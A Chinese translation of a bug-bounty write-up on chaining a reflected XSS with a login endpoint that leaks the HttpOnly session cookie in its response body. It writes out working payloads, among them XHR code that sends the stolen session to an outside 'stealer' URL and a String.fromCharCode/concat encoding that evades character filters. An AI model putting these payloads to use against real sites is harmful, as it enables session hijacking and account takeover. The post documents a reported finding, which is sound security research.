原文地址:https://medium.com/@yassergersy/xss-to-session-hijack-6039e11e6a81
通过XSS窃取HttpOnly Cookie
我写很少关于我发现,但我决定分享这些,这可能会帮助你,和POC。
首先说实话,我是最懒惰的黑客之一,我运行自己的脚本和常用工具,如wfuzz,sublister,nmap等,观看random电影,电影结束后我记得那些正在运行程序。
我对私人网站上的目录FUZZ,让我称之为jerico.com。jerico.com是一个流行的博客平台,拥有超过5亿用户。像往常一样,我用一个wordlist运行Wfuzz
wfuzz -c -z file,/root/Desktop/common-list --hc 404,400,302 https://jerico.com/FUZZ
我很惊讶地看到服务器返回
200 OK 为以下目标点
/account/settings/server
当我在浏览器中请求这个目标时,我看自己的帐户设置,我试图查看网站的源代码,并得出结论:‘server’ string 返回在一个script标签内。
<script>
var user ='server';
</SCRIPT>
当然一个非常简单的payload是:
'-alert(2) - '
所以完整的网址是:
https://jerico.com/account/settings/server'-alert(2)-'
Boom,这是一个非常简单的XSS,幸运的.
报告
你好团队
我在
https://jerico.com/account/settings/server'-alert(2)-' 找到了一个xss,
happy 修复。
是的,我喜欢在没有进一步调查的情况下报告非常简单的问题,但这次团队没有反应,所以我决定引起他们一些注意。
对我来说有趣的一点是登录。
从我之前的调查中,我发现登录后返回会话cookie
set-cookie Header
in Response body
如果您尝试登录
POST /Account/Login HTTP/1.1
HOST: jerico.com
user[email][email protected]&user[password]=qwerty
response是:
HTTP/1.1 200 OK
Set-Cookie:session=xz4z5cxz4c56zx4c6x5zc46z5xczx46cx4zc6xz4czxc;
secure;httpOnly;domain=jersico.com
{"session":"xz4z5cxz4c56zx4c6x5zc46z5xczx46cx4zc6xz4czxc"}
会话cookie被标记为httpOnly,So javascript不能操作它
但会话在响应体中返回,Javascript不能访问cookie,但它可以访问响应主体并获取受保护的cookie。
因此,要获取cookie,您需要post请求作为登录信息并获取响应body:
POST /Account/Login HTTP/1.1
HOST: jerico.com
ْX-Requested-With: XMLHttpRequest的
user[email][email protected]&user[password]=qwerty
你在开玩笑吗 ?你将如何获得电子邮件和密码。
我试图在没有任何body参数的情况下向登录目标发出请求
POST /Account/Login HTTP/1.1
Cookie: session=xz4z5cxz4c56zx4c6x5zc46z5xczx46cx4zc6xz4czxc;
HOST: jerico.com
哇!
我很幸运,服务器在响应体中返回相同的数据:
HTTP/1.1 200 OK
Set-Cookie:session=xz4z5cxz4c56zx4c6x5zc46z5xczx46cx4zc6xz4czxc;
secure;httpOnly;domain=jersico.com
{"session":"xz4z5cxz4c56zx4c6x5zc46z5xczx46cx4zc6xz4czxc"}
是的,这个计划进展顺利。
发出XHR请求登录目标
服务器在响应正文中返回sesssion id
匹配body并窃取会话。
这里是完整的JS代码来窃取cookie
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() { if (xhr.readyState == 4)
{
prompt('You are hacked , your session='+xhr.response);}
document.location.replace('//yassergersy.com/stealer?data='+xhr.response');
}
xhr.open('POST', '/account/login',true);
xhr.withCredentials = true;
xhr.send(null);
</script>
编码和发送payload失败:(大多数特殊字符被过滤:
",<>/\
对我来说,以下足以实现我的目标:
'()-.
我们需要将所有特殊字符转换为 String.fromCharCode(ascii)
空 = 32
String.fromCharCode(32)
逗号= 44
String.fromCharCode(44)
所以alert(1337)的payload将是:
eval(String.fromCharCode(97,108,101,114,116,40,49,51,51,55,41))
等等,逗号被过滤,有效载荷再次失败,我们需要另一个技巧,我的jascript技能不是很好,我试图搜索谷歌,javascript string concatenation,并找到了concat()
https://www.w3schools.com/jsref/jsref_concat_string.asp
因此,我们可以使用连接它们而不是分隔字符
.concat()
例如,如果我们需要通过 a,b
我们可以将b与使用连接起来:
'a'.concat('b')
当然,这个技巧不会用于字母字符,它将用于应用程序敏感的特殊字符
"<>/\,
所以使用concat和String.fromCharCode我们可以执行任何JS代码
我决定测试下面的有效载荷
<script>
document.location.replace("//evil.net");
</script>
这太无聊了,手动完成,于是我决定编写一个python脚本使其更容易:
https://gist.github.com/YasserGersy/a0fee5ce7422a558c84bfd7790d8a082
将payload保存到名为的文件payload.txt 并执行以下命令
python Js2S.py payload.txt
结果产生:
''.concat(String.fromCharCode(60)).concat('script').concat(String.fromCharCode(62)).concat(String.fromCharCode(10)).concat('document').concat(String.fromCharCode(46)).concat('location').concat(String.fromCharCode(46)).concat('replace').concat(String.fromCharCode(40)).concat(String.fromCharCode(34)).concat(String.fromCharCode(47)).concat(String.fromCharCode(47)).concat('evil').concat(String.fromCharCode(46)).concat('net').concat(String.fromCharCode(34)).concat(String.fromCharCode(41)).concat(String.fromCharCode(59)).concat(String.fromCharCode(10)).concat(String.fromCharCode(60)).concat(String.fromCharCode(47)).concat('script').concat(String.fromCharCode(62)).concat(String.fromCharCode(10))
这个生成的payload被认为是一个单独的字符串,不会被应用程序过滤,所以我们可以将它传递给eval并执行它
在他的情况下,我需要将这个payload写入文件中。
所以我会用 document.write(my_payload)
而不是eval,任何人都可以使用的任何功能。
所以我们的最终payload是:
https://jerico.com/Account/Settings/server`-dcument.write( <<generated-payload-by-python-script>>)'-
成功:D,让我们试试payload:
$cat myrealworldpayload.txt
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() { if (xhr.readyState == 4)
{prompt('You are hacked , your session='+xhr.response);}}
xhr.open('POST', '/account/login', true);
xhr.send(null);
</script>
和python脚本生成以下内容:
python Js2S.py myrealworldpayload.txt
output
''.concat(String.fromCharCode(60)).concat('script').concat(String.fromCharCode(62)).concat(String.fromCharCode(10)).concat('var').concat(String.fromCharCode(32)).concat('xhr').concat(String.fromCharCode(32)).concat(String.fromCharCode(61)).concat(String.fromCharCode(32)).concat('new').concat(String.fromCharCode(32)).concat(String.fromCharCode(88)).concat('MLHttpRequest').concat(String.fromCharCode(40)).concat(String.fromCharCode(41)).concat(String.fromCharCode(59)).concat(String.fromCharCode(10)).concat('xhr').concat(String.fromCharCode(46)).concat('onreadystatechange').concat(String.fromCharCode(32)).concat(String.fromCharCode(61)).concat(String.fromCharCode(32)).concat('function').concat(String.fromCharCode(40)).concat(String.fromCharCode(41)).concat(String.fromCharCode(32)).concat(String.fromCharCode(123)).concat(String.fromCharCode(32)).concat('if').concat(String.fromCharCode(32)).concat(String.fromCharCode(40)).concat('xhr').concat(String.fromCharCode(46)).concat('readyState').concat(String.fromCharCode(32)).concat(String.fromCharCode(61)).concat(String.fromCharCode(61)).concat(String.fromCharCode(32)).concat('4').concat(String.fromCharCode(41)).concat(String.fromCharCode(10)).concat(String.fromCharCode(32)).concat(String.fromCharCode(123)).concat('prompt').concat(String.fromCharCode(40)).concat(String.fromCharCode(39)).concat(String.fromCharCode(89)).concat('ou').concat(String.fromCharCode(32)).concat('are').concat(String.fromCharCode(32)).concat('hacked').concat(String.fromCharCode(32)).concat(String.fromCharCode(44)).concat(String.fromCharCode(32)).concat('your').concat(String.fromCharCode(32)).concat('session').concat(String.fromCharCode(61)).concat(String.fromCharCode(39)).concat(String.fromCharCode(43)).concat('xhr').concat(String.fromCharCode(46)).concat('response').concat(String.fromCharCode(41)).concat(String.fromCharCode(59)).concat(String.fromCharCode(125)).concat(String.fromCharCode(125)).concat(String.fromCharCode(10)).concat('xhr').concat(String.fromCharCode(46)).concat('open').concat(String.fromCharCode(40)).concat(String.fromCharCode(39)).concat('POST').concat(String.fromCharCode(39)).concat(String.fromCharCode(44)).concat(String.fromCharCode(32)).concat(String.fromCharCode(39)).concat(String.fromCharCode(47)).concat('account').concat(String.fromCharCode(47)).concat('login').concat(String.fromCharCode(39)).concat(String.fromCharCode(44)).concat(String.fromCharCode(32)).concat('true').concat(String.fromCharCode(41)).concat(String.fromCharCode(59)).concat(String.fromCharCode(10)).concat('xhr').concat(String.fromCharCode(46)).concat('send').concat(String.fromCharCode(40)).concat('null').concat(String.fromCharCode(41)).concat(String.fromCharCode(59)).concat(String.fromCharCode(10)).concat(String.fromCharCode(60)).concat(String.fromCharCode(47)).concat('script').concat(String.fromCharCode(62)).concat(String.fromCharCode(10))
现在将下面的url中xxxxxxxxxx替换为生成的payload:
https://jerico.com/Account/Settings/server`-dcument.write( <<xxxxxxxxxxxxx>>)'-
payload太长,url,但它并不重要:
我能够窃取cookie。
我发给团队的最后的POC,过程?
执行payload,首先在脚本标签内回显。
payload首先作为数学运算执行,因为我使用' - 作为减法运算,它首先会将完整的恶意payload添加到要在没有过滤的情况下执行的文档中。
payload执行并发出一个POST请求,并提取响应以提取会话ID并将其发送给攻击者网站 http://yassergersy.com, 后者将按照上图中的提示进行提示。
攻击者网站收到被盗的会话ID并记录下来。
learn:
Think in the box :D
Chain bugs for higher impact.
Never stop searching
Timeline
4–2–2018 Reported
5–2–2018 Triaged
The bounty was frustrating :(
Regards